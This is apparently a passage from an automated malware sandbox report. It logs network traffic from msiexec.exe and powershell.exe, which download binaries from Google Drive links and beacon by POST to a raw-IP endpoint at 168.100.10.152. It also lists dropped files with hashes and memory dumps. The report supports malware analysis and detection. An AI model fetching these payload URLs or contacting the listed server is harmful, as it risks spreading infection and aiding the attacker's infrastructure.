X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 467476
    Last-Modified: Fri, 27 Sep 2024 03:36:22 GMT
    X-GUploader-UploadID: AD-8lju2qUc5wl6ET5EaFugxky7QSJsN_0H9uoGDlA-kv12IBc80avpMf1RZ2uAL4oEY5WL13UM
    Date: Fri, 27 Sep 2024 11:26:58 GMT
    Expires: Fri, 27 Sep 2024 11:26:58 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=UMPsSQ==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT
    msiexec.exe
    Remote address:
    142.250.187.206:443
    Request
    GET /uc?export=download&id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 27 Sep 2024 11:27:19 GMT
    Location: https://drive.usercontent.google.com/download?id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'nonce-JZLuWXy8xOX6j4RO3hJ-9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    c.pki.goog
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.187.227
  • flag-gb
    GET
    http://c.pki.goog/r/r1.crl
    msiexec.exe
    Remote address:
    142.250.187.227:80
    Request
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 854
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Fri, 27 Sep 2024 10:43:07 GMT
    Expires: Fri, 27 Sep 2024 11:33:07 GMT
    Cache-Control: public, max-age=3000
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
    Age: 2652
  • flag-us
    DNS
    o.pki.goog
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    o.pki.goog
    IN A
    Response
    o.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.187.227
  • flag-gb
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDmcMw%2Fo03sIxABiVt5eEgl
    msiexec.exe
    Remote address:
    142.250.187.227:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDmcMw%2Fo03sIxABiVt5eEgl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Fri, 27 Sep 2024 10:30:01 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 3438
  • flag-gb
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz
    msiexec.exe
    Remote address:
    142.250.187.227:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Fri, 27 Sep 2024 11:15:24 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 715
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT&export=download
    msiexec.exe
    Remote address:
    172.217.16.225:443
    Request
    GET /download?id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="DsohtfTkZmOGuelIB199.bin"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 106560
    Last-Modified: Sun, 22 Sep 2024 23:41:56 GMT
    X-GUploader-UploadID: AD-8ljtWd9XBLgUhxyrOPL9SaxEWSVhBtoTdDKNdP-dStzZB1VqdvccO39Gh4WsZGxc_CRirQbk
    Date: Fri, 27 Sep 2024 11:27:22 GMT
    Expires: Fri, 27 Sep 2024 11:27:22 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=8kF0EA==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-nl
    POST
    http://168.100.10.152/index.php/wp.php?view=1
    msiexec.exe
    Remote address:
    168.100.10.152:80
    Request
    POST /index.php/wp.php?view=1 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 168.100.10.152
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: EC5852FA
    Content-Length: 374
    Connection: close
    Response
    HTTP/1.0 500 Internal Server Error
    Date: Fri, 27 Sep 2024 11:27:23 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Content-Length: 2773
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-nl
    POST
    http://168.100.10.152/index.php/wp.php?view=1
    msiexec.exe
    Remote address:
    168.100.10.152:80
    Request
    POST /index.php/wp.php?view=1 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 168.100.10.152
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: EC5852FA
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.0 500 Internal Server Error
    Date: Fri, 27 Sep 2024 11:27:25 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Content-Length: 2773
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-nl
    POST
    http://168.100.10.152/index.php/wp.php?view=1
    msiexec.exe
    Remote address:
    168.100.10.152:80
    Request
    POST /index.php/wp.php?view=1 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 168.100.10.152
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: EC5852FA
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.0 500 Internal Server Error
    Date: Fri, 27 Sep 2024 11:27:27 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Content-Length: 2773
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-nl
    POST
    http://168.100.10.152/index.php/wp.php?view=1
    msiexec.exe
    Remote address:
    168.100.10.152:80
    Request
    POST /index.php/wp.php?view=1 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 168.100.10.152
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: EC5852FA
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.0 500 Internal Server Error
    Date: Fri, 27 Sep 2024 11:28:30 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Content-Length: 2773
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • 142.250.187.206:443
    https://drive.google.com/uc?export=download&id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG
    tls, http
    powershell.exe
    901 B
     8.7kB
     9
    11

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG

    HTTP Response

    303
  • 172.217.16.225:443
    https://drive.usercontent.google.com/download?id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG&export=download
    tls, http
    powershell.exe
    9.3kB
     503.3kB
     190
    368

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG&export=download

    HTTP Response

    200
  • 142.250.187.206:443
    https://drive.google.com/uc?export=download&id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT
    tls, http
    msiexec.exe
    1.1kB
     8.8kB
     12
    13

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT

    HTTP Response

    303
  • 142.250.187.227:80
    http://c.pki.goog/r/r1.crl
    http
    msiexec.exe
    348 B
     1.7kB
     5
    4

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    200
  • 142.250.187.227:80
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz
    http
    msiexec.exe
    796 B
     3.1kB
     7
    6

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDmcMw%2Fo03sIxABiVt5eEgl

    HTTP Response

    200

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz

    HTTP Response

    200
  • 172.217.16.225:443
    https://drive.usercontent.google.com/download?id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT&export=download
    tls, http
    msiexec.exe
    3.0kB
     121.9kB
     52
    95

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1OA4u-20vtclLeRT2vGN1jMbY-zkFwjFT&export=download

    HTTP Response

    200
  • 168.100.10.152:80
    http://168.100.10.152/index.php/wp.php?view=1
    http
    msiexec.exe
    940 B
     3.3kB
     7
    7

    HTTP Request

    POST http://168.100.10.152/index.php/wp.php?view=1

    HTTP Response

    500
  • 168.100.10.152:80
    http://168.100.10.152/index.php/wp.php?view=1
    http
    msiexec.exe
    746 B
     3.3kB
     7
    7

    HTTP Request

    POST http://168.100.10.152/index.php/wp.php?view=1

    HTTP Response

    500
  • 168.100.10.152:80
    http://168.100.10.152/index.php/wp.php?view=1
    http
    msiexec.exe
    719 B
     3.3kB
     7
    7

    HTTP Request

    POST http://168.100.10.152/index.php/wp.php?view=1

    HTTP Response

    500
  • 168.100.10.152:80
    http://168.100.10.152/index.php/wp.php?view=1
    http
    msiexec.exe
    1.5kB
     3.4kB
     9
    8

    HTTP Request

    POST http://168.100.10.152/index.php/wp.php?view=1

    HTTP Response

    500
  • 8.8.8.8:53
    drive.google.com
    dns
    msiexec.exe
    62 B
     78 B
     1
    1

    DNS Request

    drive.google.com

    DNS Response

    142.250.187.206

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    msiexec.exe
    74 B
     90 B
     1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    172.217.16.225

  • 8.8.8.8:53
    c.pki.goog
    dns
    msiexec.exe
    56 B
     107 B
     1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.187.227

  • 8.8.8.8:53
    o.pki.goog
    dns
    msiexec.exe
    56 B
     107 B
     1
    1

    DNS Request

    o.pki.goog

    DNS Response

    142.250.187.227

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4FUCI975F5CJHH118Z76.temp
    Filesize

    7KB

    MD5

    da11dc499029ac583db3eacbfc42ab9c

    SHA1

    05bba6d5eb9f2942ce034e15cb089f4d5bdbcc5b

    SHA256

    a838e8df78d451753abf2ed79fe25528950b879de4783a162b5f6e4232b07f69

    SHA512

    f7c53c7d725f8c3173db6ba776f7fdb9391d0e1696537d1d4cce740691ac85bd97edfcf3d4ec049b1c8d421c6a42e473010cba61bbe518cc9ffb43dcf38c7434

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    a2c659ec249295386a76e9ec180bb9f3

    SHA1

    747b5228df09fc3973fb8cd80027031a902cde89

    SHA256

    3ab6278a0247258bd0000e76f158546e806d81dad4e91e88923ac59913bdfa59

    SHA512

    e4eb89303a9b7feec280ab7862c00810b663557fef882b517de65ce5e589af6eae5420dcd88a2c1b7ce5eca142f4efae8c84a1092dce46ba263c58f4ebb7f684

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Relativitetsteoriernes.Ove
    Filesize

    456KB

    MD5

    4720451553542bd139f9545c55cb3004

    SHA1

    8368cf6dd617edd586bd689124d6fd6ed7764268

    SHA256

    8a0447898832d6e21f1b1037a28eaa2ebd3cdc4f2a49b9971d52c60eb01cf38f

    SHA512

    215bd65fb55ce03cc1300821645813e754cf05956e1ee8f30e657d86aa4ee707f2cfb0c6bc6818c115e168595bd3239cdce97b723ba970e4ecaf90580bcf3df4

    Download Submit

  • memory/1388-41-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/1388-44-0x0000000000940000-0x0000000003B3A000-memory.dmp

    Filesize

    50.0MB

    Download

  • memory/2180-21-0x0000000006770000-0x000000000996A000-memory.dmp

    Filesize

    50.0MB

    Download

  • memory/2632-13-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2632-14-0x00000000002B0000-0x00000000002B8000-memory.dmp

    Filesize

    32KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.